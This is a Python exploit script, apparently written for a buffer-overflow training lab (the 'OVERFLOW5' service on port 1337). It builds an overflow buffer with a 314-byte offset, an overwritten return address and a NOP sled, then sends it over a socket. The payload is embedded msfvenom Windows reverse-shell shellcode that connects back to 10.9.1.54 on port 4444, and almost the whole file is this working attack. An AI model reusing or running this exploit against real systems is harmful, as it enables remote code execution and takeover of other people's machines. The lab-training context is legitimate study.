import socket,sys

ip = sys.argv[1] if sys.argv[1] else "10.10.11.248"
port = 1337

prefix = b"OVERFLOW5 "
offset = 314
overflow = b"A" * offset
# 625011AF
retn = b"\xAF\x11\x50\x62"
padding = b"\x90" * 16

# bad_chars = {0,0x23,0x3c,0x83,0xba}
#msfvenom -p windows/shell_reverse_tcp LHOST=10.9.1.54 LPORT=4444 EXITFUNC=thread -b "\x00\xF4\x16\xFD\x2F" -f py -v payload -o shellcode.py
payload =  b""
payload += b"\xfc\xbb\x05\x5d\x7a\x1f\xeb\x0c\x5e\x56\x31\x1e"
payload += b"\xad\x01\xc3\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff"
payload += b"\xff\xf9\xb5\xf8\x1f\x01\x46\x9d\x96\xe4\x77\x9d"
payload += b"\xcd\x6d\x27\x2d\x85\x23\xc4\xc6\xcb\xd7\x5f\xaa"
payload += b"\xc3\xd8\xe8\x01\x32\xd7\xe9\x3a\x06\x76\x6a\x41"
payload += b"\x5b\x58\x53\x8a\xae\x99\x94\xf7\x43\xcb\x4d\x73"
payload += b"\xf1\xfb\xfa\xc9\xca\x70\xb0\xdc\x4a\x65\x01\xde"
payload += b"\x7b\x38\x19\xb9\x5b\xbb\xce\xb1\xd5\xa3\x13\xff"
payload += b"\xac\x58\xe7\x8b\x2e\x88\x39\x73\x9c\xf5\xf5\x86"
payload += b"\xdc\x32\x31\x79\xab\x4a\x41\x04\xac\x89\x3b\xd2"
payload += b"\x39\x09\x9b\x91\x9a\xf5\x1d\x75\x7c\x7e\x11\x32"
payload += b"\x0a\xd8\x36\xc5\xdf\x53\x42\x4e\xde\xb3\xc2\x14"
payload += b"\xc5\x17\x8e\xcf\x64\x0e\x6a\xa1\x99\x50\xd5\x1e"
payload += b"\x3c\x1b\xf8\x4b\x4d\x46\x95\xb8\x7c\x78\x65\xd7"
payload += b"\xf7\x0b\x57\x78\xac\x83\xdb\xf1\x6a\x54\x1b\x28"
payload += b"\xca\xca\xe2\xd3\x2b\xc3\x20\x87\x7b\x7b\x80\xa8"
payload += b"\x17\x7b\x2d\x7d\xb7\x2b\x81\x2e\x78\x9b\x61\x9f"
payload += b"\x10\xf1\x6d\xc0\x01\xfa\xa7\x69\xab\x01\x20\x9c"
payload += b"\x25\x08\x86\xc8\x37\x0a\xf7\x54\xb1\xec\x9d\x74"
payload += b"\x97\xa7\x09\xec\xb2\x33\xab\xf1\x68\x3e\xeb\x7a"
payload += b"\x9f\xbf\xa2\x8a\xea\xd3\x53\x7b\xa1\x89\xf2\x84"
payload += b"\x1f\xa5\x99\x17\xc4\x35\xd7\x0b\x53\x62\xb0\xfa"
payload += b"\xaa\xe6\x2c\xa4\x04\x14\xad\x30\x6e\x9c\x6a\x81"
payload += b"\x71\x1d\xfe\xbd\x55\x0d\xc6\x3e\xd2\x79\x96\x68"
payload += b"\x8c\xd7\x50\xc3\x7e\x81\x0a\xb8\x28\x45\xca\xf2"
payload += b"\xea\x13\xd3\xde\x9c\xfb\x62\xb7\xd8\x04\x4a\x5f"
payload += b"\xed\x7d\xb6\xff\x12\x54\x72\x1f\xf1\x7c\x8f\x88"
payload += b"\xac\x15\x32\xd5\x4e\xc0\x71\xe0\xcc\xe0\x09\x17"
payload += b"\xcc\x81\x0c\x53\x4a\x7a\x7d\xcc\x3f\x7c\xd2\xed"
payload += b"\x15\x7c\xd4\x11\x96"





postfix = b""
# print('!mona bytearray -b "{}"\n!mona compare -f C:\\mona\\oscp\\bytearray.bin -a 0198FA30'.format("".join([ "\\x%0.2X" % c for c in bad_chars])))
buffer = prefix + overflow + retn + padding + payload + postfix
print("---")
try:
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)	
  s.connect((ip, port))
  # print("Sending evil buffer...")
  s.send(buffer + b"\r\n")
  print("Done!")
except Exception as e:
  print(e)
  print("Could not connect.")
